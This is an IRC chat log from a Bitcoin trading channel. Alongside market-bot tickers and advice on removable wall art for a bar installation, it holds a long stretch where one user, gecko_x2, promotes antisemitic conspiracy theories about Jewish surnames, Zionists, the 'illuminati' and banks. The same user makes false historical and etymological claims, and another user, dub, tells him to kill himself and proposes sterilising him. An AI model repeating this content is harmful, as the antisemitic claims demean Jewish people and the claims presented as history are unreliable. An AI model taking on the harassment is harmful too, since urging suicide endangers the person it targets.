<nubbins`> <jurov> On the whole, the global Bitcoin space is a self-policing community that uproots and exposes scams and unethical Bitcoin service operators with ruthless efficiency. Oct 23 01:42:01 <pankkake> hehe Oct 23 01:42:02 <nubbins`> ahahaha Oct 23 01:42:04 <nubbins`> my sides Oct 23 01:42:12 <nubbins`> where's that from? Oct 23 01:42:27 <jurov> the link above that Oct 23 01:42:34 <pankkake> I'm calling for a labcoin witch hunt, but the actual victims still don't want it Oct 23 01:42:49 <jurov> mircea_popescu: withdrawals please Oct 23 01:43:13 <assbot> [HAVELOCK] [HIM] 9 @ 0.07398 = 0.6658 BTC [-] Oct 23 01:43:45 <gecko_x2> mmm ruthless Oct 23 01:43:51 <gecko_x2> i liek dat word Oct 23 01:44:32 <gecko_x2> smoke bbl Oct 23 01:45:33 <nubbins`> pankkake: you're just trying to sabotage the sweet divs Oct 23 01:45:44 <nubbins`> like 52 satoshi per share last time i think? Oct 23 01:46:15 <pankkake> something like it, I can't see them in my cryptostocks account because they are too low Oct 23 01:46:40 <nubbins`> heh Oct 23 01:47:13 <nubbins`> well, ya know. people don't wanna admit they got scammed. they'd much rather just pretend it's not happening Oct 23 01:48:07 <pankkake> I understand that, I have a hard time simply admitting I made a bad decision Oct 23 01:48:17 <mircea_popescu> pankkake https://www.schneier.com/blog/archives/2013/10/can_i_be_truste.html Oct 23 01:48:23 <pankkake> but perhaps that mean I'm/they're not cut for the job Oct 23 01:48:32 <mircea_popescu> so much fun to be had on the internets. Oct 23 01:48:58 <pankkake> and no one's mentionning you Oct 23 01:50:44 <mircea_popescu> depends what you mean by mentioning me. Oct 23 01:53:04 <gecko_x2> virtuals is my bud Oct 23 01:53:14 <gecko_x2> remember that Oct 23 01:53:30 <gecko_x2> and he's on the case of labcoin Oct 23 01:54:00 <gecko_x2> he's the only irl bud i can talk about this shit to Oct 23 01:54:08 <gecko_x2> totally aware Oct 23 01:55:01 <gecko_x2> just wanted to say.. Oct 23 01:55:02 <nubbins`> i need to figure out how to make wallpaper paste that's easily removable from walls Oct 23 01:57:11 <mircea_popescu> you can't unscrew a lightbulb. Oct 23 01:59:10 <nubbins`> well, that's more for lack of trying Oct 23 02:00:02 <nubbins`> we're planning to do a seripop-style art installation at an event next month, and i'd love to paper the walls of the bar, but i don't think the bar will appreciate having things permanently affixed to its walls Oct 23 02:08:29 <AndrewJackson> Nubbins, paint your walls with watered down paste first, then the paper will come off easy Oct 23 02:13:21 <nubbins`> yeah, i'm reading something now that says weak cornstarch paste will allow easy removal if i paint the walls rather than the paper Oct 23 02:13:37 <nubbins`> guess i should experiment some Oct 23 02:15:35 <Vexual> http://www.liveleak.com/view?i=04f_1366644470 Oct 23 02:15:35 <ozbot> LiveLeak.com - Stupid Balkan guy "Tihomir" + hammer drill = FAIL Oct 23 02:16:18 <nubbins`> http://seripop.com/projects/uncountable-not-comparable/ Oct 23 02:16:18 <ozbot> Seripop - Yannick Desranleau and Chloe Lum - Uncountable (Not Comparable) Oct 23 02:16:26 <nubbins`> those guys do some crazy shit with paper Oct 23 02:21:51 <assbot> [HAVELOCK] [HIM] 4 @ 0.07399 = 0.296 BTC [+] Oct 23 02:23:53 <assbot> [HAVELOCK] [B] [XBOND] 405 @ 0.0011499 = 0.4657 BTC [+] Oct 23 02:24:54 <assbot> [HAVELOCK] [HIM] 3 @ 0.07399 = 0.222 BTC [+] Oct 23 02:25:55 <assbot> [HAVELOCK] [HIM] 12 @ 0.07399 = 0.8879 BTC [+] Oct 23 02:35:20 <Vexual> nubbins why not fix the artwork to removable board? Oct 23 02:35:54 <dub> fucking google Oct 23 02:36:17 <dub> my phone has turned into rage bait overnight Oct 23 02:38:18 <Vexual> get ubuntu Oct 23 02:39:02 <dub> fuck ubuntu Oct 23 02:39:07 <nubbins`> vexual, we're talking BIG artwork Oct 23 02:39:27 <Vexual> 3mm mdf is cheap Oct 23 02:39:32 <nubbins`> although that would work if the bar won't let us paste the walls Oct 23 02:40:16 <nubbins`> corrugated plastic might be an option too Oct 23 02:40:45 <Vexual> much lighter too, you could fix it with 3m double sided tape Oct 23 02:41:00 <nubbins`> hmmmm..... Oct 23 02:41:42 <nubbins`> gears turning, etc Oct 23 02:41:52 <gecko_x2> https://www.youtube.com/watch?v=HCAgbkoEPMQ Oct 23 02:41:53 <ozbot> W.A.S.P. - The Headless Children (FULL ALBUM) - YouTube Oct 23 02:41:57 <nubbins`> we wanna put up large versions of these guys puking rainbows all over the bar: http://pinkeyeprints.files.wordpress.com/2012/04/hzvrd-imgur.jpg Oct 23 02:46:04 <dub> http://productforums.google.com/forum/#!topic/websearch/NFxVP5a_dG8 Oct 23 02:46:04 <ozbot> Google Groups Oct 23 02:46:09 <Vexual> if you want to get real tricky, you could cut shapes into the corflute so that the slightly noticeable grain of the stuff follows the rainbows Oct 23 02:47:12 <mircea_popescu> get those superflat printable lcd things Oct 23 02:48:13 <nubbins`> we were thinking of printing large rectangles of paper with horizontal rainbow stripes, and overlapping them on various angles to make the rainbows swerve in different directions Oct 23 02:48:30 <nubbins`> wouldn't really work without pasting directly to the walls though Oct 23 02:48:55 <nubbins`> although, i suppose we could cut the corflute (!) into curved shapes & just join them together Oct 23 02:49:08 <Vexual> stick each rectangle to the corflute and arrange them to the wall as separate rectangles Oct 23 02:50:49 <nubbins`> hmm Oct 23 02:51:12 <nubbins`> if we cut the corflute rectangles on a diagonal, we'd have triangles which could be flipped around to create nice curves Oct 23 02:51:30 <nubbins`> http://seripop.com/projects/hording-skin/ Oct 23 02:51:30 <ozbot> Seripop - Yannick Desranleau and Chloe Lum - Hoarding Skin Oct 23 02:51:34 <mircea_popescu> so good news : asciilifeform has fixed phuctor. it works about a degree of magnitude faster now. basicvally no keys are waiting anymore. Oct 23 02:51:34 <nubbins`> ^ that's ALL PAPER Oct 23 02:58:36 <Vexual> cardboard would work too Oct 23 02:59:23 <nubbins`> at that point, could just tape the paper to the walls, i guess Oct 23 02:59:32 <Vexual> but white corflute could be illuminated from behind Oct 23 02:59:42 <nubbins`> WHOA Oct 23 02:59:44 <nubbins`> yes it could Oct 23 03:00:12 <Vexual> $5 fairy lights Oct 23 03:00:18 <nubbins`> in fact, our washout booth has a backlit corflute wall Oct 23 03:00:30 <nubbins`> even the dimmest light shines through Oct 23 03:00:49 <nubbins`> oh my god, this is going to be amazing Oct 23 03:00:49 <assbot> AMAZING COMPANY! Oct 23 03:01:25 <nubbins`> i'm sure there's a bot in an apple chan somewhere that screams MAGICAL DEVICE! every time someone says "magical" Oct 23 03:01:49 <Vexual> i want photos Oct 23 03:01:59 <nubbins`> and photos you shall get Oct 23 03:02:15 <nubbins`> aiming for late november Oct 23 03:04:38 <nubbins`> we actually have some stands left over from a multi-layered glass project that could be useful for holding corflute sheets Oct 23 03:04:39 <nubbins`> hmmmmmm Oct 23 03:04:44 <nubbins`> this gives me a lot to think about Oct 23 03:04:51 <mircea_popescu> amazing #bitcoin-assets Oct 23 03:04:52 <assbot> AMAZING COMPANY! Oct 23 03:05:08 <Vexual> http://www.youtube.com/watch?v=vbhJ9c-pFoI Oct 23 03:05:08 <ozbot> MAGIC FOUNTAIN (Official Video) - Art vs Science - YouTube Oct 23 03:09:32 <nubbins`> lel Oct 23 03:09:44 <nubbins`> that video just spurred an impromptu dance party Oct 23 03:09:45 <mircea_popescu> mod6 how's urbit these days btw ? you been keeping any track ? Oct 23 03:27:57 <assbot> [HAVELOCK] [AM1] 6 @ 0.638415 = 3.8305 BTC [+] {5} Oct 23 03:31:20 <BingoBoingo> Oh, Schneier approved my comment. https://www.schneier.com/blog/archives/2013/10/can_i_be_truste.html#c2003318 Oct 23 03:32:01 <assbot> [HAVELOCK] [HIM] 21 @ 0.07399 = 1.5538 BTC [+] Oct 23 03:32:07 <gecko_x2> nice Oct 23 03:32:10 <mircea_popescu> lol you're special. people were complaining he ate their comments earlier. Oct 23 03:32:33 <gecko_x2> i trust u all know schneier's history and who he is Oct 23 03:32:46 <gecko_x2> mp? Oct 23 03:33:05 <gecko_x2> anyways Oct 23 03:33:07 <mircea_popescu> ianae Oct 23 03:33:10 <gecko_x2> nice. Oct 23 03:33:11 <mircea_popescu> but more or less. Oct 23 03:33:31 <gecko_x2> schneier is the original crypto guy in our generation Oct 23 03:33:43 <gecko_x2> there is nobody higher really Oct 23 03:33:49 <gecko_x2> atleast publically Oct 23 03:34:04 <assbot> [HAVELOCK] [HIM] 6 @ 0.07399 = 0.4439 BTC [+] Oct 23 03:34:28 <gecko_x2> his blog is the original public crypto blog Oct 23 03:34:46 <gecko_x2> the primary enemy of the NSA and the illuminati Oct 23 03:35:04 <assbot> [HAVELOCK] [HIM] 16 @ 0.073999 = 1.184 BTC [+] Oct 23 03:35:08 <gecko_x2> so.. nice. Oct 23 03:35:42 <mircea_popescu> a yeah. kinda went downhill since 2004 tho Oct 23 03:36:02 <gecko_x2> schneier was involved in smuggling the original PGP source code outside of us borders Oct 23 03:36:21 <gecko_x2> they did it by printing it out on A4's and physically mailing it Oct 23 03:36:42 <gecko_x2> back then the pentagon defined him as enemy of the state Oct 23 03:37:01 <gecko_x2> he later fought off those charges in US courts Oct 23 03:37:06 <gecko_x2> during the 80's Oct 23 03:37:17 <gecko_x2> would never be possible today Oct 23 03:37:33 <mircea_popescu> aren't you confusing him with zimmermann ? Oct 23 03:37:43 <gecko_x2> umm yes Oct 23 03:37:50 <gecko_x2> but this isn't clear Oct 23 03:38:06 <assbot> [HAVELOCK] [HIM] 27 @ 0.075 = 2.025 BTC [+] Oct 23 03:38:06 <gecko_x2> schneier was zimm's bud Oct 23 03:38:13 <gecko_x2> so we dunno Oct 23 03:38:16 <gecko_x2> afaik Oct 23 03:38:24 <BingoBoingo> Schneier is just the Dude who submits algorithms to NIST competitions and never makes it past second place. Oct 23 03:38:48 <gecko_x2> i trust schneier more than zimm Oct 23 03:40:27 <gecko_x2> look Oct 23 03:40:59 <gecko_x2> the surname zimmerman is jewish Oct 23 03:41:12 <gecko_x2> sch is nit jew Oct 23 03:41:14 <gecko_x2> not* Oct 23 03:41:29 <gecko_x2> no jew surname begins with sch Oct 23 03:41:55 <gecko_x2> aka zion, aka illuminati Oct 23 03:43:22 <mircea_popescu> gecko_gs2 for the record, schneier was like 17 in 1980. Oct 23 03:44:05 <gecko_x2> noted Oct 23 03:44:13 <gecko_x2> still Oct 23 03:44:59 <gecko_x2> zimmerman, spielberg, lucas Oct 23 03:45:08 <gecko_x2> all zionists Oct 23 03:45:15 <gecko_x2> bunot sch Oct 23 03:45:21 <gecko_x2> but not* Oct 23 03:45:33 <gecko_x2> afak Oct 23 03:45:36 <gecko_x2> afaik Oct 23 03:45:46 <gecko_x2> damn i need more alcohol and music :D Oct 23 03:46:10 <gecko_x2> schneier is german Oct 23 03:46:16 <gecko_x2> arian Oct 23 03:48:59 <gecko_x2> now the zionists form the basis of the illuminati Oct 23 03:49:12 <gecko_x2> and the banker system known as the city of london Oct 23 03:49:31 <gecko_x2> 'the city' being the key word Oct 23 03:50:32 <gecko_x2> and yes, the huge dildo shaped building in london really does represent a penis Oct 23 03:50:50 <gecko_x2> that's how these guys work Oct 23 03:53:21 <assbot> [HAVELOCK] [AM1] 1 @ 0.6455 BTC [+] Oct 23 03:53:23 <gecko_x2> their latest trick is called 'the shard' Oct 23 03:53:54 <gecko_x2> it represents themselves fucking the ppl in the world in the anus with a broken glass bottle Oct 23 03:54:06 <gecko_x2> you can look it up. Oct 23 03:55:27 <gecko_x2> http://en.wikipedia.org/wiki/The_Shard Oct 23 03:56:13 <KRS1> yeah, and the phone company killed kennedy. Oct 23 03:56:33 <gecko_x2> what Oct 23 03:56:44 <gecko_x2> kennedy wanted to introduce debt free money Oct 23 03:56:53 <gecko_x2> and so he was taken out Oct 23 03:57:00 <gecko_x2> that's all there is to it Oct 23 03:57:57 <gecko_x2> http://www.youtube.com/watch?v=OIh3nO6-V_A Oct 23 03:57:58 <ozbot> Metallica - Whiskey in the jar - YouTube Oct 23 03:58:00 <KRS1> I think it was Northeastern Bell. Oct 23 03:58:18 <gecko_x2> Bell = illuminati Oct 23 03:58:51 <gecko_x2> the shape of a church bell represents the shape of their power structure Oct 23 03:59:43 <gecko_x2> the narrow top, the wide middle part and then the scum of the earth Oct 23 04:00:16 <KRS1> I think it was corporate or maybe one of their subsidiaries. Maybe billing. Oct 23 04:00:25 <gecko_x2> every church you visit on the earth has it's doors shaped in a certain way Oct 23 04:00:33 <gecko_x2> that shape represents the vagina Oct 23 04:00:43 <KRS1> Just had to make a new tinfoil hat. My old one fell apart. Oct 23 04:00:51 <KRS1> this one fits much better. Oct 23 04:00:58 <dub> I've lost count if this guy is trolling or an acutal fruitcake Oct 23 04:01:19 <gecko_x2> you all know how every church door is shaped with the pointy top Oct 23 04:01:32 <gecko_x2> represents the vagina and the clit Oct 23 04:01:39 <KRS1> he's got a lot of energy, he was talking all this jazz when i left the office at 4:30 Oct 23 04:01:48 <gecko_x2> that's why men used to leave all their weapons outside Oct 23 04:01:58 <KRS1> just don't mention Finland. Oct 23 04:02:08 <gecko_x2> :\ Oct 23 04:02:16 <gecko_x2> i assure you it's all true. Oct 23 04:02:27 <KRS1> Of course it is. Oct 23 04:02:33 <KRS1> I'm with ya bro. Oct 23 04:02:52 <gecko_x2> :P Oct 23 04:03:02 <gecko_x2> i'm not boosting my ego Oct 23 04:03:12 <gecko_x2> just stating the obvious Oct 23 04:03:25 <gecko_x2> you go to any capital on this planet Oct 23 04:03:33 <gecko_x2> look up the biggest building there is Oct 23 04:03:39 <gecko_x2> and it's one of 7 banks Oct 23 04:03:48 <gecko_x2> try it and u see Oct 23 04:04:10 <KRS1> hmm. Oct 23 04:04:19 <gecko_x2> any capital Oct 23 04:04:24 <gecko_x2> biggest building Oct 23 04:04:27 <dub> fails in my country Oct 23 04:04:27 <gecko_x2> look at the logo Oct 23 04:04:43 <gecko_x2> which is? Oct 23 04:05:42 <dub> its not finland Oct 23 04:05:56 <gecko_x2> ofcourse, you have to know the etymology of the word 'bank' Oct 23 04:06:03 <dub> of course Oct 23 04:06:05 <gecko_x2> do you know where that comes from? Oct 23 04:06:24 <dub> let me guess, if its made of concrete and steel its secretly a bank Oct 23 04:06:47 <gecko_x2> before humanity knew of that word, all 'banks' were called credit anzthalt' Oct 23 04:06:48 <mircea_popescu> dub same root as bankruptcy, italian (lombard) middle ages. Oct 23 04:07:00 <gecko_x2> but that word was born in london england Oct 23 04:07:17 <asciilifeform> banca, money changer's bench. thought everybody knew that one. Oct 23 04:07:27 <gecko_x2> where they figured out that it's useful to build your gold deposit house on top of a hill Oct 23 04:07:40 <gecko_x2> or 'bank' in brittish english Oct 23 04:07:49 <mircea_popescu> gecko_gs2 nah. Oct 23 04:08:22 <gecko_x2> because it was easier to fend off the ppl rushing to the place once they realized that they had issued much more receits for the gold than there actually was gold Oct 23 04:09:03 <gecko_x2> building the vault on a 'bank' or a hill was a good idea because it slowed the ppl down, and made it easier to push them down with sharp sticks Oct 23 04:09:14 <gecko_x2> when there was a 'bank run' Oct 23 04:09:17 <mircea_popescu> no dood. banca yielded banque in french, and either or both of these yielded bank in english Oct 23 04:09:20 <mircea_popescu> sometime around 1500 or so Oct 23 04:09:25 <gecko_x2> no. Oct 23 04:09:28 <gecko_x2> no no no Oct 23 04:09:34 <dub> finland says no Oct 23 04:09:49 <gecko_x2> that's all 'official' Oct 23 04:09:53 <mircea_popescu> lol Oct 23 04:10:04 <gecko_x2> all 'official' stuff u learn in school is a lie Oct 23 04:10:32 <gecko_x2> the word bank comes from the bank of england Oct 23 04:10:51 <gecko_x2> which was the first gold vault to be built upon a hill Oct 23 04:10:59 <gecko_x2> to make it easier to fend off the people Oct 23 04:11:11 <gecko_x2> with sharp spears Oct 23 04:11:38 <gecko_x2> know your histiry dudes Oct 23 04:11:43 <gecko_x2> your REAL history Oct 23 04:11:57 <dub> he right Oct 23 04:12:19 <KRS1> idk we just some dumb bitcoin monkeys what do we know Oct 23 04:12:21 <mircea_popescu> so what's the alternative etymology fior bankruptcy then ? Oct 23 04:12:24 <mircea_popescu> hill got ruptured ? Oct 23 04:12:40 <gecko_x2> pretty much yeah Oct 23 04:13:06 <gecko_x2> there is a even more interesting etymology that ties into this Oct 23 04:13:07 <mircea_popescu> gecko_gs2 you ever been in the old bank of england building ? Oct 23 04:13:19 <gecko_x2> if you want to know, or should i stfu? Oct 23 04:13:27 <gecko_x2> mp nope. Oct 23 04:13:38 <mircea_popescu> well... you'd have known its not actually on a hill. Oct 23 04:13:39 <gecko_x2> the real history of the tie Oct 23 04:13:44 <dub> if you fold up the bank does it look like twin towers? Oct 23 04:13:49 <dub> I bet it does Oct 23 04:14:00 <gecko_x2> mp afaik it actually was Oct 23 04:14:12 <mircea_popescu> how the fuck it actually was, it's close enough to the thames. Oct 23 04:14:25 <gecko_x2> but i'm no expert.. i just like etymology Oct 23 04:14:46 <gecko_x2> and i really like to know the TRUE reason for things Oct 23 04:15:32 <gecko_x2> which is not the same as you are thought through these school books Oct 23 04:15:41 <gecko_x2> what was that main publisher again Oct 23 04:16:13 <mircea_popescu> but you know, some proposed reason doersn't become true just because it contradicts the common answer. Oct 23 04:16:39 <dub> dood it becomes true when alx jones screams it Oct 23 04:17:02 <gecko_x2> dun remember, anyways check the back's of every school book published in the west Oct 23 04:17:07 <mircea_popescu> anyway. the old lady of threadneedle street. Oct 23 04:17:13 <gecko_x2> and it will lead you back to the illuminati Oct 23 04:17:19 <mircea_popescu> aka the company and governor of the bank of england Oct 23 04:17:38 <gecko_x2> this is not aj data Oct 23 04:17:41 <gecko_x2> not at all Oct 23 04:18:05 <gecko_x2> but aj is right in his own way Oct 23 04:18:25 <gecko_x2> ah Oct 23 04:18:29 <gecko_x2> was it gummerus Oct 23 04:18:38 <gecko_x2> and wellin & göös or something Oct 23 04:18:47 <assbot> [HAVELOCK] [AM1] 1 @ 0.61000001 BTC [-] Oct 23 04:18:48 <gecko_x2> every school book in the north Oct 23 04:18:48 <assbot> [MPEX] [S.MPOE] 5073 @ 0.00085765 = 4.3509 BTC [-] Oct 23 04:19:14 <dub> for the love of god, shut the fuck up Oct 23 04:19:22 <gecko_x2> lol Oct 23 04:19:25 <gecko_x2> k Oct 23 04:19:30 <dub> and preferably kill yourself immediately Oct 23 04:19:35 <gecko_x2> :( Oct 23 04:19:48 <Vexual> do the spears msut be spharp? Oct 23 04:20:04 <gecko_x2> i didn't like that dub Oct 23 04:20:23 <gecko_x2> i go away now Oct 23 04:20:24 <dub> yet you live on.. Oct 23 04:20:59 <Vexual> and thats why we have skyscrapers Oct 23 04:22:03 <gecko_x2> https://www.youtube.com/watch?v=NIWgHEbQsGw Oct 23 04:22:03 <ozbot> Ratt- Dance - YouTube Oct 23 04:23:26 <mircea_popescu> anyway, the notion of putting a bank uphill is silly... all the customers'd get tired hauling all the gold Oct 23 04:23:31 <mircea_popescu> you want it low down Oct 23 04:24:20 <Vexual> security by gravity Oct 23 04:24:44 <KRS1> Anyone here know anything about trading gold Oct 23 04:29:58 <assbot> [MPEX] [S.MPOE] 727 @ 0.00085934 = 0.6247 BTC [+] Oct 23 04:30:10 <gecko_x2> uhh mp Oct 23 04:30:40 <gecko_x2> the origins of fractional reserves stems from the gold receits in amsterdam Oct 23 04:31:10 <gecko_x2> where the ppl stored their gold in a safe vault for a receit Oct 23 04:31:44 <gecko_x2> later they noticed that periodically there was always a bank run Oct 23 04:32:04 <gecko_x2> when the ppl noticed that there were way more receits than there could ever be gold Oct 23 04:32:27 <gecko_x2> and so they built the bank vault on a hill to slow the ppl down once they came running Oct 23 04:32:43 <nubbins`> my sides Oct 23 04:33:08 <Vexual> theres no hills in amsterdam Oct 23 04:33:19 <gecko_x2> no Oct 23 04:33:25 <gecko_x2> but in london there is Oct 23 04:33:43 <mod6> when i think of finland: http://i.qkme.me/3u7ql0.jpg Oct 23 04:34:07 <asciilifeform> mod6: whatever happened to that fellow? Oct 23 04:34:08 <gecko_x2> nice. Oct 23 04:34:30 <mod6> probably eaten by a grue. Oct 23 04:34:54 <mod6> or got his dick stuck in an iceberg. Oct 23 04:34:59 <gecko_x2> "The Bank's headquarters have been in London's main financial district, the City of London, on Threadneedle Street, since 1734. It is sometimes known by the metonym The Old Lady of Threadneedle Street or The Old Lady, a name taken from the legend of Sarah Whitehead, whose ghost is said to haunt the Bank's garden.[12] The busy road junction outside is known as Bank junction." Oct 23 04:35:28 <mircea_popescu> mod6 honestly, all finn chicks i ever met were pretty hot and kinda slutty Oct 23 04:35:28 <dub> http://p.bfram.es/finland-be-afraid-be-very-afraid.jpg Oct 23 04:35:29 <mircea_popescu> nice skin too Oct 23 04:35:41 <gecko_x2> http://en.wikipedia.org/wiki/Bank_of_England Oct 23 04:35:42 <mircea_popescu> asciilifeform im pretty sure it was a sa op and got neatly closed. Oct 23 04:35:45 <dub> isnt there like 9 chicks to every dude Oct 23 04:35:52 <mircea_popescu> dub possibly. perkele. Oct 23 04:35:58 <gecko_x2> "When the idea and reality of the National Debt came about during the 18th century this was also managed by the Bank. By the charter renewal in 1781 it was also the bankers' bank – keeping enough gold to pay its notes on demand until 26 February 1797 when war had so diminished gold reserves that the government prohibited the Bank from paying out in gold. This prohibition lasted until Oct 23 04:35:59 <gecko_x2> 1821." Oct 23 04:36:36 <mod6> huh, well that seems like a saving grace. Oct 23 04:36:58 <mircea_popescu> gecko_gs2 no, actually, it weas much earlier. the 1711 south sea bubble was a mostly failed attempt to finance the english natl debt with paper. Oct 23 04:37:07 <mircea_popescu> there had been a natl debt since there was a nation. everywhere. Oct 23 04:37:32 <gecko_x2> gold was before debt Oct 23 04:37:53 <gecko_x2> gold carries no debt Oct 23 04:38:05 <gecko_x2> only storing gold carries debt Oct 23 04:38:26 <gecko_x2> and storing it.. they tried with holes foro ages Oct 23 04:38:32 <gecko_x2> for* Oct 23 04:38:47 <gecko_x2> until they realized a bank was much better than a hole Oct 23 04:39:14 <gecko_x2> because when the ppl come storming, you dont want to sit in a hole Oct 23 04:39:24 <gecko_x2> you want to be uphill Oct 23 04:39:31 <nubbins`> sitting in a bank Oct 23 04:39:36 <nubbins`> exchanging bitcoins in the lobby Oct 23 04:39:37 <gecko_x2> right Oct 23 04:40:03 <Vexual> id rather be in a hole Oct 23 04:40:20 <mircea_popescu> i never heard of a foxhill... Oct 23 04:40:23 <nubbins`> does the hole have pens you can use? Oct 23 04:40:48 <gecko_x2> i don't know if any of you know that 'the city' really means Oct 23 04:41:22 <gecko_x2> are you aware that today the city has their own police force, their own army, their own justice system and their own judges? Oct 23 04:41:38 <gecko_x2> if you take a trip to london tomorrow Oct 23 04:41:43 <mircea_popescu> and their own obgyns ? Oct 23 04:41:48 <gecko_x2> and walk into 'the city' Oct 23 04:41:53 <nubbins`> hahaha Oct 23 04:41:58 <gecko_x2> and do something to get arrested Oct 23 04:42:08 <gecko_x2> the police that arrest you will carry guns Oct 23 04:42:10 <assbot> [MPEX] [S.MPOE] 3000 @ 0.00085372 = 2.5612 BTC [-] Oct 23 04:42:19 <gecko_x2> which the rest of the english police do not Oct 23 04:42:40 <nubbins`> police not carrying guns is sort of the exception Oct 23 04:42:50 <gecko_x2> because they are a separate police force from a separate legal juridistiction Oct 23 04:43:11 <assbot> [HAVELOCK] [B] [XBOND] 8696 @ 0.0011499 = 9.9995 BTC [+] {2} Oct 23 04:43:23 <gecko_x2> you need to be aware of this shit my friends Oct 23 04:43:29 <mircea_popescu> http://nypost.com/2013/10/06/city-park-police-want-to-carry-guns/‎ Oct 23 04:44:09 <gecko_x2> the city has their own army too Oct 23 04:44:28 <gecko_x2> headquarters are called MI5 Oct 23 04:45:01 <gecko_x2> the rest of england's secret service is called MI6 Oct 23 04:45:10 <gecko_x2> 2 different entities Oct 23 04:45:13 <assbot> [HAVELOCK] [NEOBEE] 818 @ 0.00223965 = 1.832 BTC [+] {7} Oct 23 04:45:56 <nubbins`> "We’re police officers without the salary, the title and the gun." Oct 23 04:46:14 <assbot> [HAVELOCK] [SMG] 1000 @ 0.0001402 = 0.1402 BTC [-] {2} Oct 23 04:46:31 <gecko_x2> in bond movies they are always referring to MI6 Oct 23 04:46:41 <gecko_x2> never ever referring to MI5 Oct 23 04:46:58 <gecko_x2> that's also by design Oct 23 04:47:33 <gecko_x2> you need to learn your fucking history Oct 23 04:47:44 <dub> have you got kids? Oct 23 04:47:58 <gecko_x2> it's 4:47 am here Oct 23 04:48:04 <gecko_x2> what do you think? Oct 23 04:48:35 <dub> I guess that means no, how much bitcion would it take to have you sterilised? Oct 23 04:48:46 <KRS1> HAHA Oct 23 04:48:50 <gecko_x2> oh.. nice one Oct 23 04:48:55 <dub> seriously, the genome is broken enough without you polluting it further Oct 23 04:49:03 <gecko_x2> k Oct 23 04:49:08 <gecko_x2> i go afk now then Oct 23 04:49:10 <dub> have you considered homosexuality? Oct 23 04:49:49 <gecko_x2> do we have a change agent here? Oct 23 04:49:55 <gecko_x2> who cares.. cyas Oct 23 04:51:50 <Vexual> he makes a good point tho Oct 23 04:52:44 <KRS1> just shh vexual dont get him started again Oct 23 04:53:13 <KRS1> the IQ of this channel went down about 30 Oct 23 04:53:21 <assbot> [MPEX] [S.MPOE] 4312 @ 0.00085324 = 3.6792 BTC [-] {2} Oct 23 04:56:54 <Vexual> id think he will have confused himself into unconciousness soon Oct 23 04:59:03 <gecko_x2> "bank (n.1) Oct 23 04:59:03 <gecko_x2> "financial institution," late 15c., from either Old Italian banca or Middle French banque (itself from the Italian word), both meaning "table" (the notion is of the moneylender's exchange table), from a Germanic source (cf. Old High German bank "bench"); see bank (n.2)." Oct 23 04:59:13 <gecko_x2> "Bank holiday is from 1871, though the tradition is as old as the Bank of England. To cry all the way to the bank was coined 1956 by flamboyant pianist Liberace, after a Madison Square Garden concert that was packed with patrons but panned by critics." Oct 23 04:59:34 <gecko_x2> "bank (n.2) Oct 23 04:59:34 <gecko_x2> "earthen incline, edge of a river," c.1200, probably in Old English but not attested in surviving documents, from a Scandinavian source such as Old Norse banki, Old Danish banke "sandbank," from Proto-Germanic *bangkon "slope," cognate with *bankiz "shelf" (see bench (n.))." Oct 23 04:59:44 <gecko_x2> "bank (v.) Oct 23 04:59:44 <gecko_x2> "to act as a banker," 1727, from bank (n.1). As "to deposit in a bank" from 1833. Figurative sense of "to rely on" (i.e. "to put money on") is from 1884, U.S. colloquial. Meaning "to ascend," as of an incline, is from 1892. In aeronautics, from 1911. Related: Banked; banking." Oct 23 05:00:16 <dub> he's gone full retard Oct 23 05:01:06 <gecko_x2> "Meaning "to ascend," as of an incline" Oct 23 05:01:13 <gecko_x2> there u go buddy Oct 23 05:01:21 <gecko_x2> coming to you buddy Oct 23 05:02:50 <gecko_x2> bench (n.) Oct 23 05:02:50 <gecko_x2> Old English benc "long seat," from Proto-Germanic *bankiz "bank of earth," perhaps here "man-made earthwork," later "bench, table" (cf. Old Frisian bank "bench," Old Norse bekkr, Danish bænk, Middle Dutch banc, Old High German banch), from PIE root *bheg- "to break." Used for "office of a judge" since late 13c. Sporting sense "reserve of players" (in baseball, North American football, Oct 23 05:02:50 <gecko_x2> etc.) is by 1909, from literal sense of place where players sit when not in action (by 1889). Oct 23 05:03:03 <gecko_x2> bench (v.) Oct 23 05:03:03 <gecko_x2> "to take out of the game," 1902, from bench (n.) in the sporting sense. Related: Benched; benching. Old English also had a verb form, but it meant "to make benches." Oct 23 05:03:33 <gecko_x2> bank = man made hill Oct 23 05:03:45 <gecko_x2> there u go buddy Oct 23 05:03:49 <gecko_x2> now i goto bed :p Oct 23 05:04:23 <gecko_x2> "bed (v.) Oct 23 05:04:23 <gecko_x2> Old English beddian "to provide with a bed or lodgings," from bed (n.). From c.1300 as "to go to bed," also "to copulate with, to go to bed with;" 1440 as "to lay out (land) in plots or beds." Related: Bedded; bedding." Oct 23 05:04:31 <gecko_x2> bed (n.) Oct 23 05:04:32 <gecko_x2> Old English bedd "bed, couch, resting place, garden plot," from Proto-Germanic *badjam "sleeping place dug in the ground" (cf. Old Frisian, Old Saxon bed, Middle Dutch bedde, Old Norse beðr, Old High German betti, German Bett, Gothic badi "bed"), from PIE root *bhedh- "to dig, pierce" (cf. Hittite beda- "to pierce, prick," Greek bothyros "pit," Latin fossa "ditch," Lithuanian bedre Oct 23 05:04:32 <gecko_x2> "to dig," Breton bez "grave"). Both "sleeping" and "gardening" senses are in Old English. Meaning "bottom of a lake, sea, watercourse" is from 1580s. Oct 23 05:04:37 <KRS1> good god are you trying to fill up the logs or something Oct 23 05:04:51 <KRS1> u might be more annoying than that other gecko from the insurance commercials. Oct 23 05:05:08 <gecko_x2> that lizard is funny Oct 23 05:05:12 <gecko_x2> i'm not Oct 23 05:05:19 <KRS1> nope Oct 23 05:05:24 <KRS1> not entertaining in the least bit. Oct 23 05:05:29 <gecko_x2> coming to you buddy Oct 23 05:05:38 <gecko_x2> i been watching strike back Oct 23 05:05:46 <gecko_x2> the best tv action serie evar. Oct 23 05:11:04 <nubbins`> http://www.cbc.ca/news/canada/newfoundland-labrador/cbc-stories-on-leaked-report-irresponsible-minister-1.2159429 Oct 23 05:11:05 <ozbot> CBC stories on leaked report 'irresponsible': minister - Newfoundland & Labrador - CBC News Oct 23 05:16:32 <adis99> hey can we remove password on the new bet? Oct 23 05:16:39 <adis99> http://bitbet.us/bet/570/bitcoin-will-drop-back-below-150-before-end/ Oct 23 05:16:40 <ozbot> BitBet - Bitcoin will drop back below $150 before end of 2013 Oct 23 05:17:45 <assbot> [HAVELOCK] [AM1] 9 @ 0.6489 = 5.8401 BTC [+] {3} Oct 23 05:18:00 <BingoBoingo> adis99: It seems essentially by publishing the password. Oct 23 05:18:41 <adis99> in comments? Oct 23 05:22:31 <nubbins`> man, i just watched the video from that cbc article and it's making my brain hurt Oct 